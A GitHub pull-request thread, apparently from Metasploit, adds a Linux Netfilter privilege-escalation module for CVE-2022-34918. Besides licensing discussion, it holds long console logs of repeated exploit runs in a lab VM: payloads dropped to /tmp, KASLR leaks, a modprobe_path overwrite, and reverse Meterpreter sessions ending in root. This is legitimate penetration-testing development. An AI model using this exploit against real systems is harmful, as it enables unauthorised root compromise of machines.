Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it?
I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

You're right.
Yes, you have the permission to use the code.
I've added a BSD licence reference on the repo:
https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license

@randorisec
Copy link

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it?
I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

You're right. Yes, you have the permission to use the code. I've added a BSD licence reference on the repo: https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license

Hi there,
Is that ok now (regarding the licence) ?
Also can we help in anything else ?

@jmartin-tech
Copy link
Contributor

@randorisec the updates looks good we can move this PR forward based on that update.

I would recommend extracting and creating a LICENSE file so github will recognize it in your repository stats.

@red0xff
Copy link
Contributor Author

red0xff commented Sep 6, 2022

@randorisec the updates looks good we can move this PR forward based on that update.

I would recommend extracting and creating a LICENSE file so github will recognize it in your repository stats.

Done, I've added LICENSE.md.

@bwatters-r7
Copy link
Contributor

I was unable to get this to work on Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw: 
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 

* };
* The last three fields are the offsets of the corresponding symbols
*/
// 22.04 LTS
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm not passionate about changing it now that it is here and I recognize this is an artifact of the original tool, but normally I'm a fan of placing the offsets in the ruby code and passing them in as arguments. It makes expanding the target sets easier, and allows a forced exploit to run. Again, I'm not super passionate about changing it, but in the future I think that's the better paradigm.

@red0xff
Copy link
Contributor Author

red0xff commented Sep 7, 2022

I was unable to get this to work on Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw: 
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 

img
It worked for me on '5.11.0-41-generic, sure, it doesn't have the best success rate, but it's still decent, and it works.
(If it hangs like that, reboot the VM, get a session again, and test the module again).

(Tested on Ubuntu Server with that kernel version)

@bwatters-r7
Copy link
Contributor

After about 10 attempts and 5 reboots, I got a session:

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4545 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/7MhKy' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/A7FHgU' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created

[*] Meterpreter session 6 opened (10.5.135.101:4545 -> 10.5.134.179:41252) at 2022-09-08 08:57:01 -0500

[-] Failed to delete /tmp/7MhKy: Operation timed out.
[-] Failed to delete /tmp/A7FHgU: Operation timed out.
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@randorisec
Copy link

Hi, is there something else missing ? We would love to see this module landed 🤗

@bwatters-r7
Copy link
Contributor

I need to get it to work again....

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/DRXksAxm9' (765816 bytes) ...
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 4 opened (10.5.135.101:4567 -> 10.5.134.179:58040) at 2022-09-27 15:55:16 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 4
session => 4
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Qb7pg88i' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Thi6a' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 5 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Meterpreter session 5 is not valid and will be closed
[-] Failed to delete /tmp/Qb7pg88i: Operation timed out.
[-] Failed to delete /tmp/Thi6a: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 4 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 6 opened (10.5.135.101:4567 -> 10.5.134.179:34242) at 2022-09-27 15:57:19 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 6
session => 6
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/U2tRChNB' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/WOqouFDu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #5
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[-] Exploit has failed
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 7 opened (10.5.135.101:4567 -> 10.5.134.179:34592) at 2022-09-27 15:59:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/5XWtO40CI' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/kBXUCN8Zu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/5XWtO40CI: Operation timed out.
[-] Failed to delete /tmp/kBXUCN8Zu: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 2 closed.  Reason: Died
[*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:43904) at 2022-09-27 16:04:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/3AluGYr' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/sUKx6SW7' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 9 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/3AluGYr: Operation timed out.
[-] Failed to delete /tmp/sUKx6SW7: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 8 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 10 opened (10.5.135.101:4567 -> 10.5.134.179:57210) at 2022-09-27 16:09:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 10
session => 10
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Hf5kkOcpf' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Hx2Wjrwlr' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/Hf5kkOcpf: Operation timed out.
[*] Meterpreter session 9 opened (10.5.135.101:4444 -> 127.0.0.1) at 2022-09-27 16:10:12 -0500
[-] Failed to delete /tmp/Hx2Wjrwlr: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 10 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 11 opened (10.5.135.101:4567 -> 10.5.134.179:57966) at 2022-09-27 16:11:26 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 11
session => 11
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/8JKI9wK' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/K7eqJ2U' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/8JKI9wK: Operation timed out.
[-] Failed to delete /tmp/K7eqJ2U: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 11 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 12 opened (10.5.135.101:4567 -> 10.5.134.179:50556) at 2022-09-27 16:15:20 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 12
session => 12
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/sEEAde' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/fswYluB' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/sEEAde: Operation timed out.
[-] Failed to delete /tmp/fswYluB: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > show options

Module options (exploit/linux/local/netfilter_nft_set_elem_init_privesc):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMPILE    Auto             yes       Compile on target (Accepted: Auto, True, False)
   MAX_TRIES  5                yes       Number of times to execute the exploit
   SESSION    12               yes       The session to run this module on


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 12 closed.  Reason: Died

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 13 opened (10.5.135.101:4567 -> 10.5.134.179:54832) at 2022-09-27 16:18:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 13
session => 13
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/tV6ZpfjxdR' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/b4WILWg9w' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/tV6ZpfjxdR: Operation timed out.
[-] Failed to delete /tmp/b4WILWg9w: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 13 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 14 opened (10.5.135.101:4567 -> 10.5.134.179:50242) at 2022-09-27 16:20:06 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 14
session => 14
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/fdeA1Aj' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/YZ3vR' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/fdeA1Aj: Operation timed out.

@bwatters-r7
Copy link
Contributor

15th time is a charm!

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 15
session => 15
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Lrarc2Y' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/dldRHofZp' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created
[*] Meterpreter session 16 opened (10.5.135.101:4444 -> 10.5.134.179:57886) at 2022-09-27 16:27:47 -0500

[-] Failed to delete /tmp/Lrarc2Y: Operation timed out.
[-] Failed to delete /tmp/dldRHofZp: Operation timed out.

meterpreter > 
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit e27dbd2 into rapid7:master Sep 27, 2022
@bwatters-r7
Copy link
Contributor

Release Notes

This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 27, 2022
@red0xff red0xff deleted the add_exploit_cve-2022-34918 branch September 27, 2022 23:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

6 participants